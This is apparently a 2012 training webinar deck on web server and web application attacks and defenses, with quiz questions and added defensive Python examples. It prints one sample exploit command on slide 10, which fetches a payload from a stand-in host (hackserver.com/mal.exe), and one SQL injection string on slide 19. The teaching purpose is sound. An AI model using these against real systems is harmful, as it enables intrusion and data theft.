nCircle Webinar: Get your Black Belt

  1. Get Your Black Belt in Web Application Security, 26 April 2012. © 2012 nCircle. All rights reserved.
  2. Web Server and Web Applications Security
  3. Why Web Servers and Web Applications are hard to Defend
     Why is attacking a web server or web application one of the easiest attack methods?
     - On the perimeter
     - Accessible by anyone on the Internet
     - Need to balance functionality with security
     - Port 80 and port 443 (can't just block them)
     - Lack of security awareness among many web developers
     - High level of traffic: hard to distinguish an attack from high volumes of legitimate traffic
  4. Typical Attack Steps against a Web Server
     1. Reconnaissance (passive)
     2. Scanning and enumeration (active)
     3. Gaining access (exploit)
     4. Escalation of privilege
     5. Maintaining access
     6. Covering tracks and placing backdoors
  5. Two Methods of Attack: The Web Server and Web Applications
     - Web Server Attacks: vulnerabilities in the web server or web server configuration
       - Examples: buffer overflows, traversals
     - Web Application Attacks: vulnerabilities in web applications
       - Command injection
       - XSS (Cross Site Scripting)
  6. Ichi (one): With respect to defending against web attacks, what is the problem with port 80 with respect to security?
     a. It is the default TFTP port
     b. It can be closed
     c. It is not a well-known port
     d. It can't be blocked
     Difficulty: Easy/Medium
  7. Ni (two): For an attack to work on a web server or a web application, what does it need to have?
     a. An exploit
     b. A risk
     c. A vulnerability
     d. A configuration
     Difficulty: Easy/Medium
  8. Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.
  9. Web Server Attacks
  10. Buffer Overflow Attack
      A buffer overflow attack allows an attacker to overwrite code in the program's execution path and thus take control of the program to execute the attacker's code.
      Cause: poor boundary checking (checking whether a variable is within some bounds before its use).
      Example: IISHack.exe exploits the IIS HTTP daemon buffer. Below is a sample:
      c: iishack www.WebserverA.com 80 www.hackserver.com/mal.exe
  11. Web Server File System Traversal Attacks
      - Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.
      - By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.
      - The attack is initiated by inserting special characters in URLs, for example the ../ sequence.
      - Encoding can be used to bypass web server filtering.
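The check a web server needs here is that the requested path, after percent-decoding, still resolves to a location inside the document root. The following is an added example (not code from the slides or from nCircle) of such a check; the document root `/var/www/html` and the function name `resolve_request_path` are assumptions for illustration. It decodes the URL path exactly once and refuses anything that still carries a `%` afterwards, so a double-encoded `../` is rejected rather than decoded a second time.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the example (assumption, not a value from the deck).
DOC_ROOT = "/var/www/html"


def resolve_request_path(url_path: str, doc_root: str = DOC_ROOT) -> Optional[str]:
    """Map a URL path to a filesystem path that must stay under doc_root.

    Returns the normalised path, or None when the request would escape the
    document root. Percent-encoded forms of '../' (e.g. %2e%2e%2f) are judged
    after decoding, which is the bypass the slide warns about.
    """
    decoded = unquote(url_path)
    # Decode once only: if a '%' survives, the input was double-encoded and is
    # refused instead of being decoded again and again.
    if "%" in decoded:
        return None
    # Drop the leading slash so join() does not discard doc_root.
    relative = decoded.lstrip("/")
    candidate = posixpath.normpath(posixpath.join(doc_root, relative))
    root = posixpath.normpath(doc_root)
    # The result must be the root itself or lie strictly beneath it; the
    # trailing separator stops "/var/www/html2" from passing as inside
    # "/var/www/html".
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for path in ("/index.html", "/images/../index.html",
                 "/../../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd",
                 "/%252e%252e/secret"):
        print(f"{path!r:32} -> {resolve_request_path(path)}")
```

`posixpath.normpath` is a pure string operation, so the example runs offline; a production server should additionally resolve symbolic links (for example with `os.path.realpath`) before comparing against the root, because a link inside the document root can point outside it.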
  12. San (three): Which one of the following is NOT one of the typical attacks used against a web server like Apache?
      a. ARP poisoning
      b. Buffer overflow
      c. Source disclosure
      d. File system traversal
      Difficulty: Easy/Medium
  13. Shi (four): A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?
      a. Buffer boundary
      b. File system traversal
      c. Encryption
      d. File overflow
      Difficulty: Easy/Medium
  14. Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.
  15. Web Application Attacks
  16. OWASP Top 10 (2010 List) – www.owasp.org
      OWASP Top 10 Categories:
      - A1 Injection
      - A2 Cross Site Scripting (XSS)
      - A3 Broken Authentication/Session Management
      - A4 Insecure Direct Object References
      - A5 Cross Site Request Forgery (CSRF)
      - A6 Security Misconfiguration
      - A7 Insecure Cryptographic Storage
      - A8 Failure to Restrict URL Access
      - A9 Insufficient Transport Layer Encryption
      - A10 Unvalidated Redirects and Forwards
  17. Injection (Command Injection – OWASP A1)
      - Occurs when untrusted data is sent to a command interpreter as part of a command or query.
      - Cleverly formed data can trick the command interpreter into performing unintended commands or revealing unintended information.
      - Examples of command injection: SQL injection, script injection.
      - Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program.
  18. SQL Injection (Valid Data)
      As an example, the user enters Jill and Brown into two input fields on a web page. The program takes this input into the CustID variable and dynamically creates the query string:
      'SELECT * FROM accounts WHERE customerID = Jill_Brown'
      The program then sends this SQL query to the SQL database, which retrieves and displays Jill Brown's record as expected.
  19. SQL Injection (Invalid Data)
      The user enters Jane and Doe' OR '1'='1 on the web page. The program takes this input and dynamically creates the query string:
      'SELECT * FROM accounts WHERE customerID = Jane_Doe' OR '1'='1'
      The program sends this SQL query to the SQL database, which then retrieves ALL of the records in the accounts table – NOT as expected.
  20. Defenses Against SQL Injection
      - Prepared statements (parameterized queries)
      - Stored procedures
      - Escaping all user-supplied input
      - Least privilege
      - White list input validation
      Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)
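The two SQL injection slides and the first defense on the list above can be shown side by side in a few lines. The following is an added example written for this page, not code from the slides or from nCircle; it assumes a constructed in-memory SQLite `accounts` table with three rows, and that the application builds the customer ID as `first_last` and places it inside single quotes, as the invalid-data slide shows. The string-built query behaves exactly as slide 19 describes, while the parameterized version binds the same input as a value and returns nothing.

```python
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the slides' accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (customerID TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("Jill_Brown", 100), ("Jane_Doe", 250), ("Bob_Smith", 75)],
    )
    conn.commit()
    return conn


def cust_id(first: str, last: str) -> str:
    """The CustID variable from slide 18: first and last name joined by '_'."""
    return f"{first}_{last}"


def lookup_vulnerable(conn: sqlite3.Connection, first: str, last: str) -> List[Tuple]:
    """Dynamic query string, as on slides 18 and 19: the user's text becomes SQL.

    With last = "Doe' OR '1'='1" the statement becomes
    SELECT * FROM accounts WHERE customerID = 'Jane_Doe' OR '1'='1'
    and every row comes back.
    """
    query = f"SELECT * FROM accounts WHERE customerID = '{cust_id(first, last)}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, first: str, last: str) -> List[Tuple]:
    """Prepared statement: the driver binds the value, so the quote and the
    OR clause are just characters inside a customer ID that matches nobody."""
    return conn.execute(
        "SELECT * FROM accounts WHERE customerID = ?", (cust_id(first, last),)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("valid input, dynamic SQL  :", lookup_vulnerable(db, "Jill", "Brown"))
    print("valid input, parameterized:", lookup_parameterized(db, "Jill", "Brown"))
    hostile_last = "Doe' OR '1'='1"
    print("hostile input, dynamic SQL  :", lookup_vulnerable(db, "Jane", hostile_last))
    print("hostile input, parameterized:", lookup_parameterized(db, "Jane", hostile_last))
```

The other defenses on the slide layer on top of this: the database account the application uses should only be able to read `accounts` (least privilege), and an allow-list check on the name fields (letters only, for instance) would reject the quote character before it ever reaches the query.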
  21. Cross Site Scripting (XSS – OWASP A2)
      - Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. Injection usually occurs by inserting untrusted data into a user's browser via a web page request.
      (Diagram: untrusted data)
  22. Defenses Against XSS
      Primary defense: escaping untrusted data. "Escaping" is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.
      - Rule #0: Never put untrusted data in a web page except in allowed locations.
      - Rule #1: HTML-escape before inserting untrusted data into HTML element content.
      - Rules #2 - #7: These rules deal with exceptions if you put untrusted data in "unallowed" locations.
      Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
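Rules #0 and #1 above translate into a small amount of code: one escaper per allowed context, and an outright refusal for any context that has none. The following is an added example for this page, not code from the slides or from nCircle; the function and context names are assumptions, and the escaping itself is Python's standard `html.escape`. It covers element content (Rule #1) and, going one step beyond the slide, quoted attribute values, which also need the quote characters neutralised.

```python
import html
from typing import Callable, Dict


def escape_for_element_content(untrusted: str) -> str:
    """Rule #1: escape &, < and > before the text lands between tags."""
    return html.escape(untrusted, quote=False)


def escape_for_attribute(untrusted: str) -> str:
    """For a value inside a double-quoted attribute, also escape the quotes so
    the data cannot close the attribute and start a new one."""
    return html.escape(untrusted, quote=True)


# Rule #0: only locations with a known escaper are allowed. A <script> block or
# an event-handler attribute has no entry here, so untrusted data can never be
# placed there by this code.
ALLOWED_CONTEXTS: Dict[str, Callable[[str], str]] = {
    "element_content": escape_for_element_content,
    "attribute": escape_for_attribute,
}


def insert_untrusted(context: str, value: str) -> str:
    """Escape value for the named context, or refuse if the context is not allowed."""
    escaper = ALLOWED_CONTEXTS.get(context)
    if escaper is None:
        raise ValueError(f"untrusted data is not allowed in the {context!r} context")
    return escaper(value)


def render_greeting(display_name: str, search_term: str) -> str:
    """A two-slot template; every untrusted value passes through the escaper for
    the slot it is inserted into. Attribute values are always double-quoted."""
    return (
        f"<p>Hello, {insert_untrusted('element_content', display_name)}!</p>"
        f'<input type="text" name="q" value="{insert_untrusted("attribute", search_term)}">'
    )


if __name__ == "__main__":
    # Constructed hostile inputs: a tag in the name, a quote in the search term.
    print(render_greeting("<script>alert(1)</script>", 'x" onmouseover="y'))
```

Escaping is applied at output time, per context, rather than once on input: the same string may later be written into a URL or a JavaScript literal, where a different escaper (the later OWASP rules) applies.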
  23. Broken Authentication and Session Management (OWASP A3)
      - Web application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session IDs) are poorly implemented, allowing an attacker to assume someone else's identity.
  24. Defenses Against Broken Authentication and Session Management
      - Secure management of session identifiers
        - Do not put session identifiers in the URL
        - Session IDs should have a timeout feature
      - Do not allow the login process to execute from an unencrypted page
      - Password change controls
      - Password use / strength / storage
      Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
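The three session-handling points on slide 24 (IDs not in the URL, a timeout, login only over an encrypted page) fit in one small server-side session component. The following is an added example for this page, not code from the slides or from nCircle; the class and function names, the cookie name `SESSIONID`, the 15-minute idle timeout and the injectable clock are assumptions chosen for illustration. IDs come from `secrets.token_urlsafe`, are looked up in a server-side store that expires them, and travel only in a cookie marked `Secure` and `HttpOnly`.

```python
import secrets
import time
from http.cookies import SimpleCookie
from typing import Callable, Dict, Optional

IDLE_TIMEOUT_SECONDS = 15 * 60   # assumption: 15 minutes of inactivity ends a session
SESSION_ID_BYTES = 32            # 256 bits of randomness per identifier


class SessionStore:
    """Server-side map from opaque session ID to user, with idle-timeout expiry."""

    def __init__(self, timeout: float = IDLE_TIMEOUT_SECONDS,
                 clock: Callable[[], float] = time.time) -> None:
        self._sessions: Dict[str, Dict[str, object]] = {}
        self._timeout = timeout
        self._clock = clock      # injectable so expiry can be exercised offline

    def create(self, username: str) -> str:
        """Issue a fresh, unguessable ID; the user name never appears in it."""
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = {"user": username, "last_seen": self._clock()}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Return the user for a live session, or None if unknown or timed out."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self._clock() - float(entry["last_seen"]) > self._timeout:
            del self._sessions[sid]          # expired: drop it server-side
            return None
        entry["last_seen"] = self._clock()   # activity extends the idle window
        return str(entry["user"])

    def destroy(self, sid: str) -> None:
        """Logout: invalidate the ID on the server, not just in the browser."""
        self._sessions.pop(sid, None)


def session_cookie_header(sid: str) -> str:
    """Carry the ID in a cookie rather than the URL, so it is not logged in
    referrers or proxy logs; Secure keeps it off plaintext HTTP and HttpOnly
    keeps it away from page scripts."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = sid
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["samesite"] = "Lax"
    cookie["SESSIONID"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def login_allowed(request_scheme: str) -> bool:
    """Refuse to serve or process the login form over an unencrypted page."""
    return request_scheme.lower() == "https"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("jill")
    print(session_cookie_header(sid))
    print("login over http allowed? ", login_allowed("http"))
    print("login over https allowed?", login_allowed("https"))
    print("lookup:", store.lookup(sid))
```

The store keeps all state on the server, so an attacker who guesses at IDs has to hit one of 2^256 values within the idle window; the cookie flags are what keep the real ID from leaking in transit or to injected script.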
  25. Go (five): A web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?
      a. Sequence infiltration
      b. SQL injection
      c. Cookie poisoning
      d. Hidden parameter exploit
      Difficulty: Easy/Medium
  26. Roku (six): What is one of the defenses against SQL injection?
      a. Least privilege
      b. Black list input validation
      c. Sanitization
      d. Proxy manipulation
      Difficulty: Easy/Medium
  27. Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.
  28. Web Server and Web Application Defense Tools
  29. Web Server and Application Defense Tools (1 of 2)
      - Scanning and mapping tools: Ping, Nping, Nmap, Amap, SuperScan, …
      - Vulnerability and web vulnerability scanners: Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, …
      - Web proxy tools: WebScarab, Paros Proxy, Burp Proxy, …
      - Web mapping/ripping tools: Black Widow, Wget, skipfish, …
      - Communication/data transfer tools: Ncat, telnet, ftp, …
      - Exploits, exploit kits, and exploit frameworks
        - Program for a specific exploit
        - Pen test frameworks: Metasploit, Core Impact, CANVAS
  30. Web Server and Application Defense Tools (2 of 2)
      - Password cracking tools: John the Ripper, Cain and Abel, PRTK, ophcrack, …
      - Web source code examination tools: Instant Source, Firebug, …
      - SQL injection tools: BSQL Hacker, The Mole, sqlmap, Pangolin, …
  31. Network Defense Tools (Protecting the Web Server)
      - Routers
      - Firewalls (network layer)
      - Web application firewalls (application layer)
      - Web application proxies
      - Honeypots/honeynets
      - Logging
      - Intrusion Detection/Prevention Systems (IDS/IPS)
      - Host-based Intrusion Detection (HIDS), e.g. file integrity detection
      - Backups
      - Computer forensic tools
  32. Web Server Protection
      - Protect the web server
      - Vulnerability assessment
      - Harden the web server: host (OS), web server, web services
      - Logging
      - Backups and recovery
  33. Place the Web Server in an Untrusted Zone
  34. Security Harden the Web Server (1 of 2)
      - Use security hardening guides (vendor documentation, OWASP, SANS, NIST, WASC)
      - Host (OS) hardening
      - Web server hardening
        - Use tools like IIS Lockdown and URLscan
        - Harden each service you offer on your web server
        - Disable / remove anything you don't use or need: accounts, ports, services, plug-ins
        - Configuration settings
        - Permissions
  35. Security Harden the Web Server (2 of 2)
      - Authentication and access control
        - File and directory permissions
        - Account password and lockout policies
      - Logging and audit policies
      - Vulnerability and compliance assessments
        - Vulnerability scanner
        - Web application vulnerability scanner
        - Configuration scanner
        - Audits for compliance assessments
        - Penetration testing / manual testing
  36. Web Server Attack Countermeasures
      - Buffer overflow
        - Can be mitigated by conducting frequent scans for server vulnerabilities
        - Promptly acquiring and installing patches and service packs
        - Implementing effective firewalls
        - Applying web configuration lockdown utilities
      - File system traversal
        - Promptly apply patches and updates to the web server
        - Restrict privileges to executable programs such as cmd.exe
        - Set file and directory permissions
        - Locate the system software on a different disk drive from the web site software and content directory
  37. Shichi (seven): Tools such as Nmap and Amap are used primarily for which one of the following web attack steps?
      a. Banner grabbing
      b. Defeating authentication
      c. Scanning
      d. Password cracking
      Difficulty: Medium/Hard
  38. Hachi (eight): What is a good tool to help harden an IIS web server? (choose the best answer)
      a. Cain and Abel
      b. URLscan
      c. ncat
      d. WebScarab
      Difficulty: Medium/Hard
  39. Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan.
  40. Resources
      - OWASP (Open Web Application Security Project): www.owasp.org
      - NIST (National Institute of Standards and Technology): www.nist.gov
      - SANS: www.sans.org
      - Web Application Security Consortium (WASC): www.webappsec.org
      - SecTools.org: http://sectools.org
  41. Questions?